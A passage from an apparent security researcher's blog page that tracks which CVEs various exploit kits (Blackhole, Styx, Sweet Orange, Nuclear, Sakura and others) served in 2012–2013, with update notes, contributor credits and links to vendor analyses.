<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-1493</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">cve-2013-2471</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-2423</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">and + all or some</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-2460</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">exploits</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-2463</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">from the previous</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-2472</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">version</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">CVE-2013-2551</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: Times, Times New Roman, serif;">Social Eng</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
=================================================================<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4OlSbH0XeQz3iSo1ebBJjX4pMakdOG-Fq9JCMT079Z_znZUKFqz-QT35SNboqGYCu8-x2KEyG3218Sbz-lcL8knubl09JSf_4RNqnwtI4mjsWNWzFNOhyphenhyphenXbnT3nTNqYzskybbc2YVVsY/s1600/java.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4OlSbH0XeQz3iSo1ebBJjX4pMakdOG-Fq9JCMT079Z_znZUKFqz-QT35SNboqGYCu8-x2KEyG3218Sbz-lcL8knubl09JSf_4RNqnwtI4mjsWNWzFNOhyphenhyphenXbnT3nTNqYzskybbc2YVVsY/s1600/java.PNG" /></a></div>
The Explot Pack Table has been updated and you can view it here.<br />
<br />
<a href="https://docs.google.com/spreadsheet/ccc?key=0AjvsQV3iSLa1dE9EVGhjeUhvQTNReko3c2xhTmphLUE&usp=sharing" style="font-weight: bold;">Exploit Pack Table Update 19.1 - View or Download from Google Apps</a><br />
<br />
If you keep track of exploit packs and can/wish to contribute and be able to make changes, please contact me (see email in my profile)<br />
I want to thank L0NGC47, Fibon, and <a href="http://malware.dontneedcoffee.com/">Kafeine</a>, Francois Paget, Eric Romang, and other researchers who sent information for their help.<br />
<br />
<br />
<br />
<br />
<b style="background-color: #f9cb9c;">Update April 28, 2013 - added <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2423">CVE-2013-2423</a> (Released April 17, 2013) to several packs. </b><br />
<b style="background-color: #f9cb9c;">Now the following packs serve the latest Java exploit (update your Java!)</b><br />
<br />
<ol style="text-align: left;">
<li>Styx</li>
<li>Sweet Orange</li>
<li>Neutrino</li>
<li>Sakura</li>
<li>Whitehole</li>
<li>Cool</li>
<li>Safe Pack</li>
<li>Crime Boss</li>
<li>CritX</li>
</ol>
<br />
<br />
<br />
Other changes<br />
<b><u>Updated:</u></b><br />
<ol style="text-align: left;">
<li>Whitehole</li>
<li>Redkit</li>
<li>Nuclear</li>
<li>Sakura</li>
<li>Cool Pack</li>
<li>Blackhole</li>
<li>Gong Da</li>
</ol>
<b><u>Added:</u></b><br />
<ol style="text-align: left;">
<li>KaiXin</li>
<li>Sibhost</li>
<li>Popads </li>
<li>Alpha Pack</li>
<li>Safe Pack</li>
<li>Serenity</li>
<li>SPL Pack<br />
<br />
There are 5 tabs in the bottom of the sheet</li>
</ol>
<ol>
<li>2011-2013</li>
<li>References</li>
<li>2011 and older</li>
<li>List of exploit kits</li>
<li>V. 16 with older credits</li>
</ol>
<br />
<div>
</div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoOVemHN5bKeOIV7QoSwAS8W66ptLIlE2soxShfWCSmg62X12-bogFEiHbawjKxAVAXy-KtkvTvw703AL8nCt05iU8CZkOknTf1_Tk_0o5mNiOqIwGIjIlSUv1UMErnmHm4rwvl_QiUCE/s1600/goog.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="146" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoOVemHN5bKeOIV7QoSwAS8W66ptLIlE2soxShfWCSmg62X12-bogFEiHbawjKxAVAXy-KtkvTvw703AL8nCt05iU8CZkOknTf1_Tk_0o5mNiOqIwGIjIlSUv1UMErnmHm4rwvl_QiUCE/s200/goog.png" width="200" /></a><br />
<br />
<b style="background-color: #d9ead3;">March 2013</b><br />
The Explot Pack Table, which has been just updated, has migrated to Google Apps - the link is below. The new format will allow easier viewing and access for those who volunteered their time to keep it up to date. <br />
<br />
In particular, I want to thank<br />
L0NGC47, Fibon, and <a href="http://malware.dontneedcoffee.com/">Kafeine</a> for their help.<br />
<br />
There are 5 tabs in the bottom of the sheet<br />
<ol>
<li>2011-2013</li>
<li>References</li>
<li>2011 and older</li>
<li>List of exploit kits</li>
<li>V. 16 with older credits</li>
</ol>
The updates include<br />
<ol>
<li>Neutrino <i>- new</i></li>
<li>Cool Pack <i>- update</i></li>
<li>Sweet Orange <i>- update</i></li>
<li>SofosFO aka Stamp EK <i>- new</i></li>
<li>Styx 2.0 <i>- new</i></li>
<li>Impact <i>- new</i></li>
<li>CritXPack <i>- new</i></li>
<li>Gong Da <i> - update<span class="Apple-tab-span" style="white-space: pre;"> </span></i></li>
<li>Redkit<i> - update<span class="Apple-tab-span" style="white-space: pre;"> </span></i></li>
<li>Whitehole <i>- new</i></li>
<li>Red Dot <i>- new</i></li>
</ol>
<br />
<br />
<br />
<br />
<br />
<div style="text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjc05CbCJdDbfKNdbD5JMdYfoZByW-p_CZa6B7MRyYH5gn3EybzagFNqLI_dkdvdKEH6-d3TL2x9l2lJa_J0FKABQf5CioMEcIJUla5sCM_GhCSPH5rQl4P85PWGiZDjYvCXfbKVAhIQDM/s1600/EXPLOITPACKSu17.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" height="100" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjc05CbCJdDbfKNdbD5JMdYfoZByW-p_CZa6B7MRyYH5gn3EybzagFNqLI_dkdvdKEH6-d3TL2x9l2lJa_J0FKABQf5CioMEcIJUla5sCM_GhCSPH5rQl4P85PWGiZDjYvCXfbKVAhIQDM/s200/EXPLOITPACKSu17.jpg" width="200" /></a>The long overdue Exploit pack table Update 17 is finally here. It got a colorful facelift and has newer packs (Dec. 2011-today) on a separate sheet for easier reading.<br />
Updates / new entries for the following 13 packs have been added (see exploit listing below)<br />
<br />
<br />
<ol style="text-align: left;">
<li>Redkit </li>
<li>Neo Sploit</li>
<li>Cool Pack</li>
<li>Black hole 2.0</li>
<li>Black hole 1.2.5</li>
<li>Private no name</li>
<li>Nuclear 2.2 (Update to 2.0 - actual v. # is unknown)</li>
<li>Nuclear 2.1 (Update to 2.0 - actual v. # is unknown)</li>
<li>CrimeBoss</li>
<li>Grandsoft</li>
<li>Sweet Orange 1.1 Update to 1.0 actual v. # is unknown)</li>
<li>Sweet Orange 1.0</li>
<li>Phoenix 3.1.15</li>
<li>NucSoft</li>
<li>Sakura 1.1 (Update to 1.0 actual v. # is unknown)</li>
<li>AssocAID (unconfirmed) </li>
</ol>
<br />
<div>
<b style="text-align: center;"><b><b><b><b><b><span style="font-size: large;"><a href="http://www.mediafire.com/file/mxclpxgx9j9azap/ExploitPackTable_V17-Oct2012.xls">The full table in xls format - Version 17 can be downloaded from here. </a></span></b></b></b></b></b></b></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjc05CbCJdDbfKNdbD5JMdYfoZByW-p_CZa6B7MRyYH5gn3EybzagFNqLI_dkdvdKEH6-d3TL2x9l2lJa_J0FKABQf5CioMEcIJUla5sCM_GhCSPH5rQl4P85PWGiZDjYvCXfbKVAhIQDM/s1600/EXPLOITPACKSu17.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="322" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjc05CbCJdDbfKNdbD5JMdYfoZByW-p_CZa6B7MRyYH5gn3EybzagFNqLI_dkdvdKEH6-d3TL2x9l2lJa_J0FKABQf5CioMEcIJUla5sCM_GhCSPH5rQl4P85PWGiZDjYvCXfbKVAhIQDM/s640/EXPLOITPACKSu17.jpg" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<b>Exploit lists for the added/updated packs</b><br />
<b><br />
</b> <br />
<div class="p1">
<b>AssocAID (unconfirmed)</b></div>
<div class="p1">
09-'12</div>
<div class="p1">
CVE-2011-3106</div>
<div class="p1">
CVE-2012-1876</div>
<div class="p1">
CVE-2012-1880</div>
<div class="p1">
CVE-2012-3683</div>
<div class="p1">
Unknown CVE</div>
<div class="p1">
5</div>
<div class="p2">
<br /></div>
<div class="p2">
<br /></div>
<div class="p1">
<b>Redkit</b></div>
<table cellpadding="0" cellspacing="0" class="t1" style="width: 52.0px;"><tbody>
<tr> <td class="td1" valign="middle"><div class="p1">
08-'12</div>
</td> </tr>
</tbody> </table>
<div class="p1">
CVE-2010-0188</div>
<div class="p1">
CVE-2012-0507</div>
<div class="p1">
CVE-2012-4681</div>
<div class="p1">
3</div>
<div class="p2">
<br /></div>
<div class="p1">
<b>Neo Sploit</b></div>
<div class="p1">
09-'12</div>
<div class="p1">
CVE-2012-1723</div>
<div class="p1">
CVE-2012-4681</div>
<div class="p1">
2?</div>
<div class="p1">
<br /></div>
<div class="p1">
<b>Cool</b></div>
<div class="p1">
08-'12</div>
<div class="p1">
CVE-2006-0003</div>
<div class="p1">
CVE-2010-0188</div>
<div class="p1">
CVE-2011-3402</div>
<div class="p1">
CVE-2012-0507</div>
<div class="p1">
CVE-2012-1723</div>
<div class="p1">
CVE-2012-4681</div>
<div class="p1">
5</div>
<div class="p2">
<br /></div>
<div class="p1">
<b>Black hole 2.0</b></div>
<div class="p1">
09-'12</div>
<div class="p1">
CVE-2006-0003</div>
<div class="p1">
CVE-2010-0188</div>
<div class="p1">
CVE-2012-0507</div>
<div class="p1">
CVE-2012-1723</div>
<div class="p1">
CVE-2012-4681</div>
<div class="p1">
CVE-2012-4969 promised</div>
<div class="p1">
5</div>
<div class="p2">
<br /></div>
<div class="p1">
<b>Black hole 1.2.5</b></div>
<div class="p1">
08-'12</div>
<div class="p1">
CVE-2006-0003</div>
<div class="p1">
CVE-2007-5659 /2008-0655</div>
<div class="p1">
CVE-2008-2992</div>
<div class="p1">
CVE-2009-0927</div>
<div class="p1">
CVE-2010-0188</div>
<div class="p1">
CVE-2010-1885</div>
<div class="p1">
CVE-2011-0559</div>
<div class="p1">
CVE-2011-2110</div>
<div class="p1">
CVE-2012-1723</div>
<div class="p1">
CVE-2012-1889</div>
<div class="p1">
CVE-2012-4681</div>
<div class="p1">
11</div>
<div class="p2">
<br /></div>
<div class="p1">
<b>Private no name</b></div>
<div class="p1">
09-'12</div>
<div class="p1">
CVE-2010-0188</div>
<div class="p1">
CVE-2012-1723</div>
<div class="p1">
CVE-2012-4681</div>
<div class="p1">
3</div>
<div class="p2">
<br /></div>
<div class="p1">
<b>Nuclear 2.2 (Update to 2.0 - actual v. # is unknown)</b></div>
<div class="p1">
03-'12</div>
<div class="p1">
CVE-2010-0188</div>
<div class="p1">
CVE-2011-3544</div>
<div class="p1">
CVE-2012-1723</div>
<div class="p1">
CVE-2012-4681</div>
<div class="p1">
4</div>
<div class="p2">
<br /></div>
<div class="p1">
<b>Nuclear 2.1 (Update to 2.0 - actual v. # is unknown)</b></div>
<div class="p1">
03-'12</div>
<div class="p1">
CVE-2010-0188</div>
<div class="p1">
CVE-2011-3544</div>
<div class="p1">
CVE-2012-1723</div>
<div class="p1">
3</div>
<div class="p2">
<br /></div>
<div class="p1">
<b>CrimeBoss</b></div>
<div class="p1">
09-'12</div>
<div class="p1">
Java Signed Applet</div>
<div class="p1">
CVE-2011-3544</div>
<div class="p1">
CVE-2012-4681</div>
<div class="p1">
3</div>
<div class="p2">
<br /></div>
<div class="p1">
<b>Grandsoft</b></div>
<div class="p1">
09-'12</div>
<div class="p1">
CVE-2010-0188</div>
<div class="p1">
CVE-2011-3544</div>
<div class="p1">
2?</div>
<div class="p2">
<b><br />
</b></div>
<div class="p1">
<b>Sweet Orange 1.1</b></div>
<div class="p1">
09-'12</div>
<div class="p1">
CVE-2006-0003</div>
<div class="p1">
CVE-2010-0188</div>
<div class="p1">
CVE-2011-3544</div>
<div class="p1">
CVE-2012-4681</div>
<div class="p1">
4?</div>
<div class="p2">
<br /></div>
<div class="p1">
<b>Sweet Orange 1.0</b></div>
<div class="p1">
05-'12</div>
<div class="p1">
CVE-2006-0003</div>
<div class="p1">
CVE-2010-0188</div>
<div class="p1">
CVE-2011-3544</div>
<div class="p1">
3?</div>
<div class="p2">
<br /></div>
<div class="p1">
<b>Phoenix 3.1.15</b></div>
<div class="p1">
05-'12</div>
<div class="p1">
CVE-2010-0842</div>
<div class="p1">
CVE: 2010-0248</div>
<div class="p1">
CVE-2011-2110</div>
<div class="p1">
CVE-2011-2140</div>
<div class="p1">
CVE: 2011-2371</div>
<div class="p1">
CVE-2011-3544</div>
<div class="p1">
CVE-2011-3659</div>
<div class="p1">
Firefox social</div>
<div class="p1">
CVE: 2012-0500</div>
<div class="p1">
CVE-2012-0507</div>
<div class="p1">
CVE-2012-0779</div>
<div class="p1">
11</div>
<div class="p2">
<br /></div>
<div class="p1">
<b>NucSoft</b></div>
<div class="p1">
2012</div>
<div class="p1">
CVE-2010-0188</div>
<div class="p1">
CVE-2012-0507</div>
<div class="p1">
2</div>
<div class="p2">
<br /></div>
<div class="p1">
<b>Sakura 1.1</b></div>
<div class="p1">
08-'12</div>
<div class="p1">
CVE-2006-0003</div>
<div class="p1">
CVE-2010-0806</div>
<div class="p1">
CVE-2010-0842</div>
<div class="p1">
CVE-2011-3544</div>
<div class="p1">
CVE-2012-4681</div>
<div class="p1">
5</div>
<br />
<br /></div>
<div style="background-color: #fff2cc; text-align: left;">
<i><span style="font-size: small;"><b>Version 16. April 2, 2012</b></span></i></div>
<div style="text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3IepoTpZu9Ct-CPRh-sa7vxM63U6Jxe_g6ML8BodM_uYUaWco_RSCwyE2kzE2YxPuUfsXpaB3kXV2kg-ag5a5l-ddQ5P0pSfC4R2RcspYY5HZo8FWKxrXbcTRZxzBqOY6xAQ2AYLgyLo/s1600/www.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3IepoTpZu9Ct-CPRh-sa7vxM63U6Jxe_g6ML8BodM_uYUaWco_RSCwyE2kzE2YxPuUfsXpaB3kXV2kg-ag5a5l-ddQ5P0pSfC4R2RcspYY5HZo8FWKxrXbcTRZxzBqOY6xAQ2AYLgyLo/s400/www.jpg" width="81" /></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3IepoTpZu9Ct-CPRh-sa7vxM63U6Jxe_g6ML8BodM_uYUaWco_RSCwyE2kzE2YxPuUfsXpaB3kXV2kg-ag5a5l-ddQ5P0pSfC4R2RcspYY5HZo8FWKxrXbcTRZxzBqOY6xAQ2AYLgyLo/s1600/www.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-left: 1em;"><br />
</a> </div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
<i>Thanks to Kahu security <br />
for Wild Wild West graphic </i></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: center;">
<b><b><b><b><b><b><span style="font-size: large;">The full table in xls format - Version 16 can be downloaded from here. </span></b></b></b></b></b></b></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<b><span style="font-size: small;"><br />
</span></b></div>
<div style="text-align: center;">
<br />
<b><span style="font-size: large;"><span style="font-size: small;"> </span></span></b><span style="font-size: large;"><span style="font-size: small;"> </span></span></div>
<div style="text-align: left;">
<span style="font-size: large;"><span style="font-size: small;"> </span></span></div>
<div style="text-align: left;">
<span style="font-size: large;"><span style="font-size: small;"><br />
</span></span></div>
<div style="text-align: left;">
<span style="font-size: large;"><span style="font-size: small;"><br />
</span></span></div>
<div style="text-align: left;">
<span style="font-size: large;"><span style="font-size: small;"><br />
</span></span></div>
<div style="text-align: left;">
<span style="font-size: large;"><span style="font-size: small;"><br />
</span></span></div>
<div style="text-align: left;">
<span style="font-size: large;"><span style="font-size: small;"><br />
</span></span></div>
<div style="text-align: left;">
<span style="font-size: large;"><span style="font-size: small;"><br />
</span></span></div>
<div style="text-align: left;">
<span style="font-size: large;"><span style="font-size: small;"><br />
</span></span></div>
<div style="text-align: left;">
<span style="font-size: large;"><span style="font-size: small;"><br />
</span></span></div>
<div style="text-align: left;">
<span style="font-size: large;"><span style="font-size: small;"><br />
</span></span></div>
<div style="text-align: left;">
<span style="font-size: large;"><span style="font-size: small;"><br />
</span></span></div>
<div style="text-align: left;">
<u><b>ADDITIONS AND CHANGES</b>:</u></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<span style="font-size: large;"><span style="font-size: small;"><b></b></span></span></div>
<div style="text-align: left;">
<u><b>1. Blackhole Exploit Kit 1.2.3</b></u></div>
<div style="text-align: left;">
<i>Added:</i></div>
<div style="text-align: left;">
<i></i></div>
<ol style="text-align: left;">
<li><span class="rss:item">CVE-2011-0559 - Flash memory corruption <a href="http://www.f-secure.com/weblog/archives/00002342.html">via F-Secure</a></span></li>
<li>CVE-2012-0507 - <span style="font-size: large;"><span style="font-size: small;">Java Atomic </span></span><a href="http://krebsonsecurity.com/2012/03/new-java-attack-rolled-into-exploit-packs/">via Krebs on Security</a><span style="font-size: large;"><span style="font-size: small;"><a href="http://krebsonsecurity.com/2011/11/new-java-attack-rolled-into-exploit-kits/"></a></span></span></li>
<li>CVE-2011-3544 - Java Rhino <span style="font-size: large;"><span style="font-size: small;"><a href="http://krebsonsecurity.com/2011/11/new-java-attack-rolled-into-exploit-kits/">via Krebs on Security</a></span></span> </li>
</ol>
<div style="text-align: left;">
<span class="rss:item"> </span></div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
<u><b>2. Eleonore Exploit Kit </b></u><b><u>1.8.91 and above- <a href="http://www.kahusecurity.com/2012/escalating-java-attacks/">via Kahu Security</a></u></b></div>
<div style="text-align: left;">
<b></b><i>Added:</i></div>
<div style="text-align: left;">
<i></i></div>
<ol style="text-align: left;">
<li>CVE-2012-0507 - <span style="font-size: large;"><span style="font-size: small;">Java Atomic- after<b> </b></span></span><b style="font-weight: normal;">1.8.91was released</b></li>
<li>CVE-2011-3544 - Java Rhino<i> </i></li>
<li><b></b><a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3521">CVE-2011-3521</a><i> - </i>Java Upd.27 see <a href="https://twitter.com/#%21/TimoHirvonen/status/186660979310997504">Timo Hirvonen</a>, <a href="http://contagiodump.blogspot.com/2012/03/java-cve-2012-0507-atmic-cve-2012-0506.html#more">Contagio</a>, <a href="http://www.kahusecurity.com/2012/escalating-java-attacks/">Kahu Security</a> and <a href="http://schierlm.users.sourceforge.net/TypeConfusion.html">Michael 'mihi' Schierl </a></li>
<li>CVE-2011-2462 - Adobe PDF U3D</li>
</ol>
<blockquote class="tr_bq" style="text-align: left;">
<i>Also includes</i><br />
"Flash pack" (presumably the same as before)<br />
"Quicktime" - CVE-2010-1818 ?</blockquote>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4LjCTINUGRZPsJGg_2bXu3YhnkLxEk1lMp4LL-vOshYPjJEtkNL05W3rxmMk9yZyYsWI_FdwmsVgvaEpKRen257p4xAKp2OYOVIRJt8blASVaecIeOZh8tvdOBlfRSiFaQ95QucTEw5w/s1600/incognito.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4LjCTINUGRZPsJGg_2bXu3YhnkLxEk1lMp4LL-vOshYPjJEtkNL05W3rxmMk9yZyYsWI_FdwmsVgvaEpKRen257p4xAKp2OYOVIRJt8blASVaecIeOZh8tvdOBlfRSiFaQ95QucTEw5w/s1600/incognito.png" /></a><u><b>3. Incognito Exploit Pack</b> <b>v.2 and above</b> <a href="http://stopmalvertising.com/malware-reports/analysis-of-an-incognito-v2.0-exploit-kit.html"> </a></u></div>
<div style="text-align: left;">
there are rumors that Incognito development stopped after v.2 in 2011 and it is a different pack now. If you know, please send links or files.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<i>Added after v.2 was released:</i></div>
<ol style="text-align: left;">
<li>CVE-2012-0507 - <span style="font-size: large;"><span style="font-size: small;">Java Atomic</span></span></li>
</ol>
<div style="text-align: left;">
<span style="font-size: large;"><span style="font-size: small;"></span></span></div>
<div style="text-align: left;">
<span style="font-size: large;"><span style="font-size: small;">See V.2 analysis<b> </b></span></span><a href="http://stopmalvertising.com/malware-reports/analysis-of-an-incognito-v2.0-exploit-kit.html">via StopMalvertizing</a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<span style="font-size: large;"><span style="font-size: small;"><u><b>4. Phoenix Exploit Kit v3.1 - <a href="http://malware.dontneedcoffee.com/">via Malware Don't Need Coffee</a></b></u></span></span></div>
<div style="text-align: left;">
<span style="font-size: large;"><span style="font-size: small;"><i>Added:</i></span></span></div>
<ol style="text-align: left;">
<li>CVE-2012-0507 - <span style="font-size: large;"><span style="font-size: small;">Java Atomic</span></span></li>
<li>CVE-2011-3544 - Java Rhino + <span style="font-size: large;"><span style="font-size: small;">Java TC (in one file)</span></span></li>
</ol>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<span style="font-size: large;"><span style="font-size: small;"><b></b></span></span></div>
<div style="text-align: left;">
<u><b><span style="font-size: large;"><span style="font-size: small;">5. Nuclear Pack v.2 -<a href="http://www.blogger.com/A%20New%20Neighbor%20in%20Town:%20The%20Nuclear%20Pack%20v2.0%20Exploit%20Kit"> via TrustWave Spiderlabs</a></span></span></b></u></div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQG1bJEo3S4_dhrtnwEuTA7yXxE8xZvgifXy75-5J_8LDNXTn5uEm-jh0miLOPVPmPSwRr_axxxWToPSlinzkxafDgJ_b1feEXuppSK5tic7XdRmgMl0ZYIepcVh7ruJDizD737S-DsYk/s1600/6a0133f264aa62970b016764817b22970b-800wi.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQG1bJEo3S4_dhrtnwEuTA7yXxE8xZvgifXy75-5J_8LDNXTn5uEm-jh0miLOPVPmPSwRr_axxxWToPSlinzkxafDgJ_b1feEXuppSK5tic7XdRmgMl0ZYIepcVh7ruJDizD737S-DsYk/s1600/6a0133f264aa62970b016764817b22970b-800wi.png" /></a> <br />
<br />
<ol style="text-align: left;">
<li>CVE-2011-3544 Oracle Java Rhino </li>
<li>CVE-2010-0840 JRE Trusted Method Chaining </li>
<li>CVE-2010-0188 Acrobat Reader – LibTIFF </li>
<li>CVE-2006-0003 MDAC</li>
</ol>
<div style="text-align: left;">
<u><b>6. Sakura Exploit Pack > v.1 <a href="https://damagelab.org/index.php?showtopic=22595&hl=sakura">via DaMaGeLaB</a></b></u></div>
<div style="text-align: left;">
<br /></div>
<ol style="text-align: left;">
<li>CVE-2011-3544 - Java Rhino (It was in Exploitpack table v15, listing it to show all packs with this exploit)</li>
</ol>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<b></b></div>
<div style="text-align: left;">
<b><u>7. Chinese Zhi Zhu Pack <a href="http://www.kahusecurity.com/2012/another-chinese-pack/">via Kahu Security</a> and <a href="http://blogs.mcafee.com/mcafee-labs/another-overview-of-exploit-packs">Francois Paget (McAfee)</a></u></b><b></b></div>
<ol style="text-align: left;">
<li>CVE-2012-0003 - WMP MIDI </li>
<li>CVE-2011-1255 - IE Time Element Memory Corruption </li>
<li>CVE-2011-2140 - Flash 10.3.183.x </li>
<li>CVE-2011-2110 - Flash 10.3.181.x </li>
<li>CVE-2010-0806 - IEPeers</li>
</ol>
<br />
<div style="text-align: left;">
</div>
<div style="text-align: left;">
<u><b>8. Gong Da Pack <a href="http://www.kahusecurity.com/2012/chinese-pack-using-dadongs-jsxx-vip-script/">via Kahu Security</a> </b></u></div>
<ol style="text-align: left;">
<li>CVE-2011-2140 - Flash 10.3.183.x </li>
<li>CVE-2012-0003 - WMP MIDI </li>
<li>CVE-2011-3544 - Java Rhino </li>
</ol>
<div style="color: #666666; text-align: left;">
<u><b>9. Dragon Pack - <a href="https://damagelab.org/index.php?showtopic=20804&st=0">via DaMaGeLab </a></b><a href="https://damagelab.org/index.php?showtopic=20804&st=0">December </a></u><u><a href="https://damagelab.org/index.php?showtopic=20804&st=0">2010 - it is old, listing for curiosity sake</a><b><a href="https://damagelab.org/index.php?showtopic=20804&st=0"><br />
</a></b></u></div>
<div style="color: #666666; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; color: #666666; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWmNDUiHQxl6Lv9Pq-jW-sRD9DILfWhUeR1drAL1MFbGrzCiwpTtuuoAbTMWI3LsbZjSkROZqccEk8_ASWJjC16uknSkhNCNtlyxUBiqJUNB-qNUwB6_sZhyphenhyphenISGwXQAcqcFwHF4d6qaNs/s1600/%D0%B2%D0%BA%D1%84%D0%BF%D1%89%D1%82%D0%B7%D1%84%D1%81%D0%BB.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="67" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWmNDUiHQxl6Lv9Pq-jW-sRD9DILfWhUeR1drAL1MFbGrzCiwpTtuuoAbTMWI3LsbZjSkROZqccEk8_ASWJjC16uknSkhNCNtlyxUBiqJUNB-qNUwB6_sZhyphenhyphenISGwXQAcqcFwHF4d6qaNs/s320/%D0%B2%D0%BA%D1%84%D0%BF%D1%89%D1%82%D0%B7%D1%84%D1%81%D0%BB.jpg" width="320" /></a></div>
<div style="color: #666666; text-align: left;">
<br /></div>
<div style="color: #666666; text-align: left;">
<br /></div>
<div style="color: #666666; text-align: left;">
<br /></div>
<div style="color: #666666; text-align: left;">
<br /></div>
<ol style="text-align: left;">
<li style="color: #666666;">CVE-2010-0886 - Java SMB</li>
<li style="color: #666666;">CVE-2010-0840 - JRE Trusted Method Chaining</li>
<li style="color: #666666;">CVE-2008-2463 - Snapshot</li>
<li style="color: #666666;">CVE-2010-0806 - IEPeers</li>
<li style="color: #666666;">CVE-2007-5659/2008-0655 - Collab.collectEmailInfo</li>
<li style="color: #666666;">CVE-2008-2992 - util.printf</li>
<li style="color: #666666;">CVE-2009-0927 - getIco</li>
<li><span style="color: #666666;">CVE-2009-4324 - newPlaye</span>r</li>
</ol>
<br />
<div style="text-align: left;">
</div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
</div>
